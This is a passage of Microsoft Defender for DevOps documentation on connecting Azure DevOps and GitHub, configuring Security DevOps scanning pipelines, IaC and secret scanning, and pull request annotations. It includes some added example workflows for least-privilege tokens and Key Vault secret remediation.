feature that helps you manage your Azure DevOps resources alongside your Azure 
resources. 

• Workload protection features: You can extend the threat detection capabilities 
and advanced defenses in Defender for Cloud to your Azure DevOps resources. 


API calls that Defender for Cloud performs count against the Azure DevOps global 
consumption limit. For more information, see the common questions about Microsoft 
Defender for DevOps. 


Prerequisites 
To complete this quickstart, you need: 


• An Azure account with Defender for Cloud onboarded. If you don't already have an 
Azure account, create one for free. 

• The Microsoft Security DevOps Azure DevOps extension configured. 


Availability 


Aspect                   Details 

Release state:           Preview. The Azure Preview Supplemental Terms include legal terms that 
                         apply to Azure features that are in beta, in preview, or otherwise not yet 
                         released into general availability. 

Pricing:                 For pricing, see the Defender for Cloud pricing page. 

Required permissions:    Account Administrator with permissions to sign in to the Azure portal. 
                         Contributor on the Azure subscription where the connector will be created. 
                         Security Admin in Defender for Cloud. 
                         Organization Administrator in Azure DevOps. 
                         Basic or Basic + Test Plans Access Level in Azure DevOps. Third-party 
                         applications gain access via OAuth, which must be set to On. Learn more 
                         about OAuth. 

Regions:                 Central US, West Europe, Australia East 

Clouds:                  Commercial: supported. 
                         National (Azure Government, Azure China 21Vianet): not supported. 


Connect your Azure DevOps organization 


To connect your Azure DevOps organization to Defender for Cloud by using a native 
connector: 


1. Sign in to the Azure portal £. 


2. Go to Microsoft Defender for Cloud > Environment settings. 


3. Select Add environment. 


4. Select Azure DevOps. 
   [Screenshot: the Environment settings page, with the Add environment menu listing 
   Amazon Web Services, Google Cloud Platform, GitHub (preview) and Azure DevOps (preview).] 

5. Enter a name, subscription, resource group, and region. 

   The subscription is the location where Microsoft Defender for DevOps creates and 
   stores the Azure DevOps connection. 

6. Select Next: Select plans. 
7. Select Next: Authorize connection. 
8. Select Authorize. 

   The authorization automatically signs in by using the session from your browser's 
   tab. After you select Authorize, if you don't see the Azure DevOps organizations 
   that you expect, check whether you're signed in to Microsoft Defender for Cloud 
   on one browser tab and signed in to Azure DevOps on another browser tab. 

9. In the popup dialog, read the list of permission requests, and then select Accept. 
   The dialog lists the OAuth scopes the connector requests: 

   o Read users, their licenses, and the projects and extensions they can access. 
   o Notifications (diagnostics): access to notification-related diagnostic logs and 
     the ability to enable diagnostics for individual subscriptions. 
   o Audit Read Log: read the auditing log. 
   o Audit Manage Streams: manage auditing streams. 

   By selecting Accept, you allow the app to perform these actions on your behalf. If you 
   change your mind at any time, you can manage authorizations on your profile page. 

10. Select your relevant organizations from the drop-down menu. 
11. For projects, do one of the following: 

   • Select Auto discover projects to discover all projects automatically and apply 
     auto-discovery to all current and future projects. 

   • Select your relevant projects from the drop-down menu. Then, select Auto-discover 
     repositories or select individual repositories. 

12. Select Next: Review and create. 
13. Review the information, and then select Create. 


The Defender for DevOps service automatically discovers the organizations, projects, 
and repositories that you selected and analyzes them for any security problems. 


When you select auto-discovery during the onboarding process, repositories can take 
up to 4 hours to appear. 


The Inventory page shows your selected repositories. The Recommendations page 
shows any security problems related to a selected repository. 


Next steps 

• Learn more about Defender for DevOps. 
• Learn more about Azure DevOps. 
• Learn how to create your first pipeline. 
• Learn how to configure pull request annotations in Defender for Cloud. 


Configure the Microsoft Security DevOps GitHub action 

Article • 06/18/2023 

Microsoft Security DevOps is a command line application that integrates static analysis 
tools into the development lifecycle. Security DevOps installs, configures, and runs the 
latest versions of static analysis tools (including, but not limited to, SDL/security and 
compliance tools). Security DevOps is data-driven with portable configurations that 
enable deterministic execution across multiple environments. 


Security DevOps uses the following tools (all open source except AntiMalware): 

Name               Language / scope                                                License 

AntiMalware        AntiMalware protection in Windows from Microsoft Defender for    Not Open Source 
                   Endpoint, that scans for malware and breaks the build if 
                   malware has been found. This tool scans by default on the 
                   windows-latest agent. 
Bandit             Python                                                          Apache License 2.0 
BinSkim            Binary: Windows, ELF                                            MIT License 
ESLint             JavaScript                                                      MIT License 
Template Analyzer  ARM template, Bicep file                                        MIT License 
Terrascan          Terraform (HCL2), Kubernetes (JSON/YAML), Helm v3, Kustomize,    Apache License 2.0 
                   Dockerfiles, CloudFormation 
Trivy              Container images, file systems, git repositories                 Apache License 2.0 

Prerequisites 

• An Azure subscription. If you don't have an Azure subscription, create a free 
account before you begin. 

• Connect your GitHub repositories. 

• Follow the guidance to set up GitHub Advanced Security. 

• Open the Microsoft Security DevOps GitHub action in a new window. 

• Ensure that Workflow permissions are set to Read and Write on the GitHub 
repository. This is the repository-wide default for the GITHUB_TOKEN; the upload 
step in the sample workflow in this article needs write access to code scanning 
alerts (security-events) to publish SARIF results. If you prefer not to widen the 
repository default, a workflow can instead declare the permissions it needs with a 
permissions key, which overrides the repository setting for that workflow. 


Configure the Microsoft Security DevOps GitHub action 

To set up the GitHub action: 

1. Sign in to GitHub. 
2. Select the repository you want to configure the GitHub action for. 
3. Select Actions. 
4. Select New workflow. 
5. On the Get started with GitHub Actions page, select set up a workflow yourself. 
6. In the text box, enter a name for your workflow file. For example, msdevopssec.yml. 
7. Copy and paste the following sample action workflow into the Edit new file tab. 
yml 

name: MSDO windows-latest 
on: 
  push: 
    branches: 
      - main 

jobs: 
  sample: 
    name: Microsoft Security DevOps Analysis 

    # MSDO runs on windows-latest. 
    # ubuntu-latest and macos-latest support coming soon 
    runs-on: windows-latest 

    steps: 

      # Checkout your code repository to scan 
      - uses: actions/checkout@v3 

      # Run analyzers 
      - name: Run Microsoft Security DevOps Analysis 
        uses: microsoft/security-devops-action@preview 
        id: msdo 

      # Upload alerts to the Security tab 
      - name: Upload alerts to Security tab 
        uses: github/codeql-action/upload-sarif@v2 
        with: 
          sarif_file: ${{ steps.msdo.outputs.sarifFile }} 

      # Upload alerts file as a workflow artifact 
      - name: Upload alerts file as a workflow artifact 
        uses: actions/upload-artifact@v3 
        with: 
          name: alerts 
          path: ${{ steps.msdo.outputs.sarifFile }} 

For details on various input options, see action.yml. 


8. Select Start commit. 
9. Select Commit new file. 

   The process can take up to one minute to complete. 

10. Select Actions and verify the new action is running. 


View scan results 

To view your scan results: 

1. Sign in to GitHub. 
2. Navigate to Security > Code scanning alerts > Tool. 
3. From the dropdown menu, select Filter by tool. 


Code scanning findings will be filtered by specific MSDO tools in GitHub. These code 
scanning results are also pulled into Defender for Cloud recommendations. 
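The sample workflow in the configuration steps above relies on the repository-wide Read and write default for the GITHUB_TOKEN. The following variant is added here as an example; it is not code from this page or from Microsoft's action repository. It declares only the token permissions the job needs, runs on pull requests as well as pushes to main, and skips the SARIF upload for pull requests from forks, which run with a read-only token and would otherwise fail at that step. The permissions block, the pull_request trigger and the fork condition are my additions; the action references, the sarifFile output and the windows-latest runner are the ones the page uses. Pinning each third-party action to a full commit SHA is the usual hardening step in production, but no specific SHA is given on this page, so tags are kept here.

```yaml
name: MSDO windows-latest (least privilege)

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

# Least privilege for GITHUB_TOKEN, declared at workflow level so the
# repository-wide "Read and write" default is not relied on:
#   contents: read          checkout needs to read the repository
#   security-events: write  upload-sarif writes code scanning alerts
#   actions: read           upload-sarif reads workflow-run metadata
#                           on private repositories
permissions:
  contents: read
  security-events: write
  actions: read

jobs:
  msdo:
    name: Microsoft Security DevOps Analysis
    # MSDO runs on windows-latest (as noted on this page).
    runs-on: windows-latest

    steps:
      # Check out the code to scan.
      - uses: actions/checkout@v3

      # Run all MSDO analyzers. In a real repository, replace the tag
      # with a full commit SHA so a moved tag cannot change what runs.
      - name: Run Microsoft Security DevOps Analysis
        uses: microsoft/security-devops-action@preview
        id: msdo

      # Publish findings to Security > Code scanning alerts.
      # Fork pull requests get a read-only GITHUB_TOKEN, so the upload
      # would fail; skip it there and rely on the artifact instead.
      - name: Upload alerts to Security tab
        if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false
        uses: github/codeql-action/upload-sarif@v2
        with:
          sarif_file: ${{ steps.msdo.outputs.sarifFile }}

      # Keep the raw SARIF for offline review; this works for fork PRs too.
      - name: Upload alerts file as a workflow artifact
        uses: actions/upload-artifact@v3
        with:
          name: alerts
          path: ${{ steps.msdo.outputs.sarifFile }}
```

Save this as .github/workflows/msdevopssec.yml in place of the sample above. Findings still land under Security > Code scanning alerts, and are pulled into Defender for Cloud recommendations once the repository is connected, as described in the quickstart.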


Learn more 

• Learn about GitHub actions for Azure. 
• Learn how to deploy apps from GitHub to Azure. 

Next steps 

• Learn more about Defender for DevOps. 
• Learn how to connect your GitHub to Defender for Cloud. 
• Discover misconfigurations in Infrastructure as Code (IaC). 


Configure the Microsoft Security DevOps Azure DevOps extension 

Article • 10/06/2023 

Note 

Effective December 31, 2022, the Microsoft Security Code Analysis (MSCA) 
extension is retired. MSCA is replaced by the Microsoft Security DevOps Azure 
DevOps extension. MSCA customers should follow the instructions in this article to 
install and configure the extension. 

Microsoft Security DevOps is a command line application that integrates static analysis 
tools into the development lifecycle. Microsoft Security DevOps installs, configures, and 
runs the latest versions of static analysis tools (including, but not limited to, SDL/security 
and compliance tools). Microsoft Security DevOps is data-driven with portable 
configurations that enable deterministic execution across multiple environments. 

Microsoft Security DevOps uses the following tools (all open source except AntiMalware): 


Name               Language / scope                                                License 

AntiMalware        AntiMalware protection in Windows from Microsoft Defender for    Not Open Source 
                   Endpoint, that scans for malware and breaks the build if 
                   malware has been found. This tool scans by default on the 
                   windows-latest agent. 
Bandit             Python                                                          Apache License 2.0 
BinSkim            Binary: Windows, ELF                                            MIT License 
ESLint             JavaScript                                                      MIT License 
Template Analyzer  ARM template, Bicep file                                        MIT License 
Terrascan          Terraform (HCL2), Kubernetes (JSON/YAML), Helm v3, Kustomize,    Apache License 2.0 
                   Dockerfiles, CloudFormation 
Trivy              Container images, file systems, git repositories                 Apache License 2.0 

Note 

Effective September 20, 2023, the secret scanning (CredScan) tool within the 
Microsoft Security DevOps (MSDO) Extension for Azure DevOps has been 
deprecated. MSDO secret scanning will be replaced with GitHub Advanced 
Security for Azure DevOps. 


Prerequisites 

• Admin privileges to the Azure DevOps organization are required to install the 
extension. 

If you don't have access to install the extension, you must request access from your 
Azure DevOps organization's administrator during the installation process. 

Configure the Microsoft Security DevOps Azure DevOps extension 

To configure the Microsoft Security DevOps Azure DevOps extension: 


1. Sign in to Azure DevOps. 
2. Navigate to Shopping Bag > Manage extensions. 
3. Select Shared. 

   Note 

   If you've already installed the Microsoft Security DevOps extension, it will 
   be listed in the Installed tab. 

4. Select Microsoft Security DevOps. 
5. Select Install. 
6. Select the appropriate organization from the dropdown menu. 
7. Select Install. 
8. Select Proceed to organization. 


Configure your pipelines using YAML 

To configure your pipeline using YAML: 

1. Sign in to Azure DevOps. 
2. Select your project. 
3. Navigate to Pipelines. 
4. Select New pipeline. 
5. Select Azure Repos Git. 
6. Select the relevant repository. 
7. Select Starter pipeline. 
8. Paste the following YAML into the pipeline: 

yml 

# Starter pipeline 
# Start with a minimal pipeline that you can customize to build and deploy your code. 
# Add steps that build, run tests, deploy, and more: 
# https://aka.ms/yaml 
trigger: none 
pool: 
  vmImage: 'windows-latest' 
steps: 
- task: MicrosoftSecurityDevOps@1 
  displayName: 'Microsoft Security DevOps' 

9. To commit the pipeline, select Save and run. 

The pipeline will run for a few minutes and save the results. 

Note 

Install the SARIF SAST Scans Tab extension on the Azure DevOps organization in 
order to ensure that the generated analysis results will be displayed automatically 
under the Scans tab. 


Learn more 

• Learn how to create your first pipeline. 
• Learn how to deploy pipelines to Azure. 

Next steps 

• Learn more about Defender for DevOps. 
• Learn how to connect your Azure DevOps to Defender for Cloud. 
• Discover misconfigurations in Infrastructure as Code (IaC). 

Discover misconfigurations in Infrastructure as Code (IaC) 

Once you have set up the Microsoft Security DevOps GitHub action or Azure DevOps 
extension, you can configure the YAML configuration file to run a single tool or multiple 
tools. For example, you can set up the action or extension to run Infrastructure as Code 
(IaC) scanning tools only. This can help reduce pipeline run time. 


Prerequisites 

• Configure Microsoft Security DevOps for GitHub and/or Azure DevOps based on 
your source code management system: 
  o Microsoft Security DevOps GitHub action 
  o Microsoft Security DevOps Azure DevOps extension 

• Ensure you have an IaC template in your repository. 


Configure IaC scanning and view the results in GitHub 

1. Sign in to GitHub. 
2. Navigate to your repository's home page > .github/workflows > msdevopssec.yml 
   that was created in the prerequisites. 
3. Select Edit file. 
4. Under the Run analyzers section, add: 

yml 

        with: 
          categories: 'IaC' 

   Note 

   Categories are case sensitive. 

   The step then reads: 

yml 

      # Run analyzers 
      - name: Run Microsoft Security DevOps Analysis 
        uses: microsoft/security-devops-action@preview 
        id: msdo 
        with: 
          categories: 'IaC' 

5. Select Start commit. 
6. Select Commit changes. 


7. (Optional) Add an IaC template to your repository. Skip if you already have an IaC 
   template in your repository. 

   For example, commit an IaC template to deploy a basic Linux web application to 
   your repository. 

   a. In the azure-quickstart-templates repository, select azuredeploy.json. 
   b. Select Raw. 
   c. Copy all the information in the file. 

JSON 

{ 
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 
  "contentVersion": "1.0.0.0", 
  "parameters": { 
    "webAppName": { 
      "type": "string", 
      "defaultValue": "AzureLinuxApp", 
      "metadata": { 
        "description": "Base name of the resource such as web app name and app service plan " 
      }, 
      "minLength": 2 
    }, 
    "sku": { 
      "type": "string", 
      "defaultValue": "S1", 
      "metadata": { 
        "description": "The SKU of App Service Plan " 
      } 
    }, 
    "linuxFxVersion": { 
      "type": "string", 
      "defaultValue": "php|7.4", 
      "metadata": { 
        "description": "The Runtime stack of current web app" 
      } 
    }, 
    "location": { 
      "type": "string", 
      "defaultValue": "[resourceGroup().location]", 
      "metadata": { 
        "description": "Location for all resources." 
      } 
    } 
  }, 
  "variables": { 
    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", 
    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" 
  }, 
  "resources": [ 
    { 
      "type": "Microsoft.Web/serverfarms", 
      "apiVersion": "2020-06-01", 
      "name": "[variables('appServicePlanName')]", 
      "location": "[parameters('location')]", 
      "sku": { 
        "name": "[parameters('sku')]" 
      }, 
      "kind": "linux", 
      "properties": { 
        "reserved": true 
      } 
    }, 
    { 
      "type": "Microsoft.Web/sites", 
      "apiVersion": "2020-06-01", 
      "name": "[variables('webAppPortalName')]", 
      "location": "[parameters('location')]", 
      "kind": "app", 
      "dependsOn": [ 
        "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]" 
      ], 
      "properties": { 
        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]", 
        "siteConfig": { 
          "linuxFxVersion": "[parameters('linuxFxVersion')]" 
        } 
      } 
    } 
  ] 
} 

   d. On GitHub, navigate to your repository. 
   e. Select Add file > Create new file. 
   f. Enter a name for the file. 
   g. Paste the copied information into the file. 
   h. Select Commit new file. 

   The file is now added to your repository. 

8. Confirm the Microsoft Security DevOps scan completed: 

   a. Select Actions. 
   b. Select the workflow to see the results. 

9. Navigate to Security > Code scanning alerts to view the results of the scan (filter 
   by tool as needed to see just the IaC findings). 


Configure IaC scanning and view the results in Azure DevOps 

To view the results of the IaC scan in Azure DevOps: 

1. Sign in to Azure DevOps. 
2. Select the desired project. 
3. Select Pipelines. 
4. Select the pipeline where the Microsoft Security DevOps Azure DevOps extension 
   is configured. 
5. Edit the pipeline configuration YAML file, adding the following lines to the 
   MicrosoftSecurityDevOps task: 

yml 

  inputs: 
    categories: 'IaC' 

   The task then reads: 

yml 

- task: MicrosoftSecurityDevOps@1 
  displayName: 'Microsoft Security DevOps' 
  inputs: 
    categories: 'IaC' 

6. Select Save. 
7. (Optional) Add an IaC template to your repository. Skip if you already have an IaC 
   template in your repository. 
8. Select Save to commit directly to the main branch or Create a new branch for this 
   commit. 
9. Select Pipelines > Your created pipeline to view the results of the IaC scan. 
10. Select any result to see the details. 


View details and remediation information on IaC rules included with Microsoft Security DevOps 

The IaC scanning tools that are included with Microsoft Security DevOps are Template 
Analyzer (which contains PSRule) and Terrascan. 

Template Analyzer runs rules on ARM and Bicep templates. You can learn more about 
Template Analyzer's rules and remediation details. 

Terrascan runs rules on ARM, CloudFormation, Docker, Helm, Kubernetes, Kustomize, 
and Terraform templates. You can learn more about the Terrascan rules. 


Learn more

• Learn more about Template Analyzer.
• Learn more about PSRule.
• Learn more about Terrascan.

In this tutorial you learned how to configure the Microsoft Security DevOps GitHub
Action and Azure DevOps Extension to scan for Infrastructure as Code (IaC) security
misconfigurations and how to view the results.

Next steps

Learn more about Defender for DevOps.
Learn how to connect your GitHub to Defender for Cloud.
Learn how to connect your Azure DevOps to Defender for Cloud.


Detect exposed secrets in code

When passwords and other secrets are stored in source code, it poses a significant risk
and could compromise the security of your environments. Defender for Cloud offers a
solution by using secret scanning to detect credentials, secrets, certificates, and other
sensitive content in your source code and your build output. Secret scanning can be run
as part of the Microsoft Security DevOps for Azure DevOps extension. To explore the
options available for secret scanning in GitHub, learn more about secret scanning in
GitHub.

Note

Effective September 2023, the Secret Scanning option (CredScan) within the Microsoft
Security DevOps (MSDO) Extension for Azure DevOps will be deprecated. MSDO
Secret Scanning will be replaced by the Configure GitHub Advanced Security for
Azure DevOps features - Azure Repos offering.

Check the list of supported file types, exit codes and rules and descriptions.


Prerequisites

• An Azure subscription. If you don't have a subscription, you can sign up for a free
account.
• Configure the Microsoft Security DevOps Azure DevOps extension.

Set up secret scanning in Azure DevOps

You can run secret scanning as part of the Azure DevOps build process by using the
Microsoft Security DevOps (MSDO) Azure DevOps extension.

To add secret scanning to the Azure DevOps build process:

1. Sign in to Azure DevOps.
2. Navigate to Pipelines.
3. Locate the pipeline where the MSDO Azure DevOps Extension is configured.
4. Select Edit.
5. Add the following lines to the YAML file, under the MicrosoftSecurityDevOps@1 task:

yml

inputs:
  categories: 'secrets'

6. Select Save.

With these lines in place, secret scanning runs each time the pipeline executes a build.


Remediate secrets findings

When credentials are discovered in your code, remove them from the source and switch to
a method that doesn't expose the secrets directly in your source code. Treat a committed
credential as compromised and rotate it: deleting it from the current commit doesn't
remove it from the repository history. Best practices for handling this situation include:

• Eliminating the use of credentials (if possible).
• Using secret storage such as Azure Key Vault (AKV).
• Updating your authentication methods to take advantage of managed identities
(MSI) via Azure Active Directory (AAD).

Remediate secrets findings using Azure Key Vault

1. Create a key vault using PowerShell.
2. Add any necessary secrets for your application to your Key Vault.
3. Update your application to connect to Key Vault using managed identity with one
of the following:

• Azure Key Vault for App Service applications
• Azure Key Vault for applications deployed to a VM

Once you have remediated findings, you can review the Best practices for using Azure
Key Vault.

Remediate secrets findings using managed identities

Before you can remediate secrets findings using managed identities, you need to ensure
that the Azure resource you're authenticating to in your code supports managed
identities. You can check the full list of Azure services that can use managed identities to
access other services.

If your Azure service is listed, you can manage your identities for Azure resources.
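The Key Vault and managed identity remediations above are described for application code. The same pattern applies to a pipeline definition, which CredScan also scans (*.yml is a supported file type). The following added example, which is not Microsoft's code, shows one Azure Pipelines job before and after remediation: the committed password is replaced by a secret fetched at run time through the `AzureKeyVault@2` task, where the service connection's identity (a managed identity or service principal granted secret get/list permissions on the vault) authenticates instead of a stored credential. The service connection name `contoso-arm-connection`, the vault name `contoso-kv` and the secret name `DbPassword` are placeholders.

```yaml
# Added example (not from the Microsoft documentation): remediating a
# CredScan finding in a pipeline definition.
#
# --- Before: the credential is committed with the pipeline. CredScan flags
# --- the `dbPassword` line, and anyone with read access to the repo has it.
#
# variables:
#   dbPassword: 'P@ssw0rd-committed-to-git'   # constructed sample secret
# steps:
#   - script: ./deploy.sh --password "$(dbPassword)"
#
# --- After: no secret in source control; it is read from Key Vault per run.
steps:
  # Pull only the secrets this job needs. SecretsFilter is a comma-separated
  # list of secret names; '*' would fetch every secret in the vault.
  - task: AzureKeyVault@2
    displayName: 'Fetch secrets from Key Vault'
    inputs:
      azureSubscription: 'contoso-arm-connection'   # placeholder service connection
      KeyVaultName: 'contoso-kv'                    # placeholder vault name
      SecretsFilter: 'DbPassword'
      RunAsPreJob: false

  # Secrets fetched by AzureKeyVault@2 become secret pipeline variables: they
  # are masked in logs and are not exposed to scripts unless mapped into env
  # explicitly, which is why the script reads $DB_PASSWORD rather than
  # interpolating $(DbPassword) into the command line.
  - script: ./deploy.sh --password "$DB_PASSWORD"
    displayName: 'Deploy'
    env:
      DB_PASSWORD: $(DbPassword)
```

After switching to this form, rotate the password that was in the repository history, then re-run the pipeline so the secret scan result for the file returns to healthy.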


Suppress false positives

When the scanner runs, it may detect credentials that are false positives. Inline
suppression can be used to suppress false positives.

Some reasons to suppress false positives include:

• Fake or mocked credentials in test files. These credentials can't access resources.
• Placeholder strings. For example, placeholder strings may be used to initialize a
variable, which is then populated using a secret store such as AKV.
• External libraries or SDKs that are directly consumed. For example, openssl.
• Hard-coded credentials for an ephemeral test resource that only exists for the
lifetime of the test being run.
• Self-signed certificates that are used locally and not used as a root. For example,
they may be used when running on localhost to allow HTTPS.
• Source-controlled documentation with non-functional credentials for illustration
purposes only.
• Invalid results. The output isn't a credential or a secret.

You may want to suppress fake secrets in unit tests or mock paths, or inaccurate results.
We don't recommend using suppression for test credentials. Test credentials can still
pose a security risk and should be securely stored.

Note

Valid inline suppression syntax depends on the language, data format and
CredScan version you are using.

Credentials that are used for test resources and environments shouldn't be suppressed.
They're used for demonstration purposes only and don't affect anything else.


Suppress a same-line secret

To suppress a secret that is found on the same line, add the following code as a
comment at the end of the line that has the secret:

Bash

#[SuppressMessage("Microsoft.Security", "CS001:SecretInLine", Justification="...")]

Suppress a secret in the next line

To suppress the secret found in the next line, add the following code as a comment
before the line that has the secret:

Bash

#[SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="...")]


Next steps

• Learn how to configure pull request annotations in Defender for Cloud to
remediate secrets in code before they're shipped to production.

Enable pull request annotations in GitHub and Azure DevOps

Defender for DevOps exposes security findings as annotations in Pull Requests (PR).
Security operators can enable PR annotations in Microsoft Defender for Cloud. Any
exposed issues can then be remedied by developers. This process can prevent and fix
potential security vulnerabilities and misconfigurations before they enter the production
stage. Defender for DevOps annotates the vulnerabilities within the differences in the
file rather than all the vulnerabilities detected across the entire file. Developers are able
to see annotations in their source code management systems and security operators
can see any unresolved findings in Microsoft Defender for Cloud.

With Microsoft Defender for Cloud, you can configure PR annotations in Azure DevOps.
You can get PR annotations in GitHub if you're a GitHub Advanced Security customer.

Note

GitHub Advanced Security for Azure DevOps (GHAzDO) is providing a free trial of
PR annotations during the Defender for DevOps preview.

What are pull request annotations

Pull request annotations are comments that are added to a pull request in GitHub or
Azure DevOps. These annotations provide feedback on the code changes made and
identified security issues in the pull request and help reviewers understand the changes
that are made.

Annotations can be added by a user with access to the repository, and can be used to
suggest changes, ask questions, or provide feedback on the code. Annotations can also
be used to track issues and bugs that need to be fixed before the code is merged into
the main branch. Defender for DevOps uses annotations to surface security findings.


Prerequisites

For GitHub:

• An Azure account. If you don't already have an Azure account, you can create your
Azure free account today.
• Be a GitHub Advanced Security customer.
• Connect your GitHub repositories to Microsoft Defender for Cloud.
• Configure the Microsoft Security DevOps GitHub action.

For Azure DevOps:

• An Azure account. If you don't already have an Azure account, you can create your
Azure free account today.
• Have write access (owner/contributor) to the Azure subscription.
• Connect your Azure DevOps repositories to Microsoft Defender for Cloud.
• Configure the Microsoft Security DevOps Azure DevOps extension.
• Set up secret scanning in Azure DevOps.


Enable pull request annotations in GitHub

By enabling pull request annotations in GitHub, your developers gain the ability to see
their security issues when they create a PR directly to the main branch.

To enable pull request annotations in GitHub:

1. Navigate to GitHub and sign in.
2. Select a repository that you've onboarded to Defender for Cloud.
3. Navigate to Your repository's home page > .github/workflows.
4. Select msdevopssec.yml, which was created in the prerequisites.
5. Select Edit.
6. Locate and update the trigger section to include:

yml

# Triggers the workflow on push or pull request events but only for the
# main branch
pull_request:
  branches: ["main"]

You can also view a sample repository.

(Optional) You can select which branches you want to run it on by entering the
branch(es) under the trigger section. If you want to include all branches, remove
the lines with the branch list.

7. Select Start commit.
8. Select Commit changes.

Any issues that are discovered by the scanner will be viewable in the Files changed
section of your pull request.
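For reference, here is a complete `.github/workflows/msdevopssec.yml` with the `pull_request` trigger from step 6 in context. This is an added example written for this page, not the sample repository's file: the action reference `microsoft/security-devops-action@latest`, its `categories` input and its `sarifFile` output are taken from that action's README at the time of writing and should be confirmed against the current README; the workflow name and runner are placeholders. The final step uploads the SARIF to code scanning, which is what makes the findings appear under Security > Code scanning alerts and as annotations in the PR's Files changed tab.

```yaml
# Added example workflow (not from the Microsoft documentation or the sample repo).
name: MSDO

on:
  push:
    branches: ["main"]
  # Running on pull_request is what produces the PR annotations; a push-only
  # trigger would scan main after merge, too late to block the change.
  pull_request:
    branches: ["main"]

permissions:
  contents: read
  # github/codeql-action/upload-sarif needs this to write code scanning alerts.
  security-events: write

jobs:
  msdo:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v4

      # The MSDO CLI runs on .NET; install the SDK it expects.
      - uses: actions/setup-dotnet@v4
        with:
          dotnet-version: 6.0.x

      - name: Run Microsoft Security DevOps
        id: msdo
        uses: microsoft/security-devops-action@latest
        with:
          # Comma-separated analyzer categories (assumption: see the action README).
          # Omit this input to run every analyzer.
          categories: 'IaC,secrets'

      - name: Upload results to the Security tab
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: ${{ steps.msdo.outputs.sarifFile }}
```

The `permissions` block matters on repositories where the default `GITHUB_TOKEN` permissions have been restricted to read-only: without `security-events: write` the upload step fails and no annotations are produced even though the scan ran.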
Resolve security issues in GitHub

To resolve security issues in GitHub:

1. Navigate through the page and locate an affected file with an annotation.
2. Follow the remediation steps in the annotation. If you choose not to remediate the
annotation, select Dismiss alert.
3. Select a reason to dismiss:

• Won't fix - The alert is noted but won't be fixed.
• False positive - The alert isn't valid.
• Used in tests - The alert isn't in the production code.


Enable pull request annotations in Azure DevOps

By enabling pull request annotations in Azure DevOps, your developers gain the ability
to see their security issues when they create PRs directly to the main branch.

Enable Build Validation policy for the CI Build

Before you can enable pull request annotations, your main branch must have the Build
Validation policy enabled for the CI Build.

To enable the Build Validation policy for the CI Build:

1. Sign in to your Azure DevOps project.
2. Navigate to Project settings > Repositories.
3. Select the repository to enable pull requests on.
4. Select Policies.
5. Navigate to Branch Policies > Main branch.
6. Locate the Build Validation section.
7. Ensure the build validation for your repository is toggled to On.
8. Select Save.

In the Edit build policy dialog, choose the build pipeline, set Trigger to Automatic
(whenever the source branch is updated), and set Policy requirement to Required so the
build must succeed before the pull request can complete (Optional means a build
failure doesn't block completion). Build expiration controls when a passing result
becomes stale, for example after 12 hours if main has been updated.

Once you've completed these steps, you can select the build pipeline you created
previously and customize its settings to suit your needs.


Enable pull request annotations

To enable pull request annotations in Azure DevOps:

1. Sign in to the Azure portal.
2. Navigate to Defender for Cloud > DevOps Security.
3. Select all relevant repositories to enable the pull request annotations on.
4. Select Configure.
5. Toggle Pull request annotations to On. The configuration applies to all selected
repositories in Azure DevOps.
6. (Optional) Select a category from the drop-down menu (for example, Secret scanning).

Note

Only secret scan results and Infrastructure-as-Code misconfigurations for
ARM/Bicep templates are currently supported.

7. (Optional) Select a severity level from the drop-down menu (for example, High).
8. Select Save.

All annotations on your pull requests will be displayed from now on based on your
configuration.
Resolve security issues in Azure DevOps

Once you've configured the scanner, you're able to view all issues that were detected.

To resolve security issues in Azure DevOps:

1. Sign in to Azure DevOps.
2. Navigate to Repos > Pull requests.
3. On the Overview or Files page, locate an affected line with an annotation.
4. Follow the remediation steps in the annotation.
5. Select Active to change the status of the annotation and access the dropdown
menu.
6. Select an action to take:

• Active - The default status for new annotations.
• Pending - The finding is being worked on.
• Resolved - The finding has been addressed.
• Won't fix - The finding is noted but won't be fixed.
• Closed - The discussion in this annotation is closed.

Defender for DevOps reactivates an annotation if the security issue isn't fixed in a new
iteration.

Learn more

Learn more about Defender for DevOps.
Learn how to discover misconfigurations in Infrastructure as Code.
Learn how to detect exposed secrets in code.

Next steps

Now learn more about Defender for DevOps.


Common questions about 
Defender for DevOps 


FAQ 


Get answers to common questions about Microsoft Defender for DevOps. 


Scan specific folders for secrets in ADO repos with CredScan

If you want to scan specific folders in Azure DevOps repos with CredScan, you can use:

yml

env:
  credscan_targetdirectory: 'NameOfFolderToScanForSecrets/'

A full ADO YAML file for a pipeline that does CredScan scanning for secrets on a specific
folder could look like this:

yml

trigger:
  branches:
    include:
      - main
      - master

pool:
  vmImage: "windows-latest"

steps:
  - task: MicrosoftSecurityDevOps@1
    displayName: "Microsoft Security DevOps"
    inputs:
      categories: 'secrets'
      break: false
    env:
      credscan_targetdirectory: 'NameOfFolderToScanForSecrets/'


Why am I getting an error while trying to connect?

When you select the Authorize button, the account that you're logged in with is used.
That account can have the same email but may have a different tenant. Make sure you
have the right account/tenant combination selected in the popup consent screen and
Visual Studio.

You can check which account is signed in.


Why can't I find my repository? 
The Azure DevOps service only supports TfsGit. 


Ensure that you've onboarded your repositories to Microsoft Defender for Cloud. If you 
still can't see your repository, ensure that you're signed in with the correct Azure 
DevOps organization user account. Your Azure subscription and Azure DevOps 
Organization need to be in the same tenant. If the user for the connector is wrong, you 
need to delete the previously created connector, sign in with the correct user account 
and re-create the connector. 


Why didn't Secret scan run on my code? 


To ensure your code is scanned for secrets, make sure you've onboarded your 
repositories to Defender for Cloud. 


In addition to onboarding resources, you must have the Microsoft Security DevOps 
(MSDO) Azure DevOps extension configured for your pipelines. The extension runs 
secret scan along with other scanners. 


If no secrets are identified through scans, the total exposed secret for the resource 
shows Healthy in Defender for Cloud. 


If secret scan isn't enabled (meaning MSDO isn't configured for your pipeline) or a scan 
isn't performed for at least 14 days, the resource shows as N/A in Defender for Cloud. 


Why don't I see the generated SARIF file in the path I chose to drop it?

If you don't see the SARIF file in the expected path, you may have chosen a different drop
path than CodeAnalysisLogs/msdo.sarif. Currently you should drop your SARIF
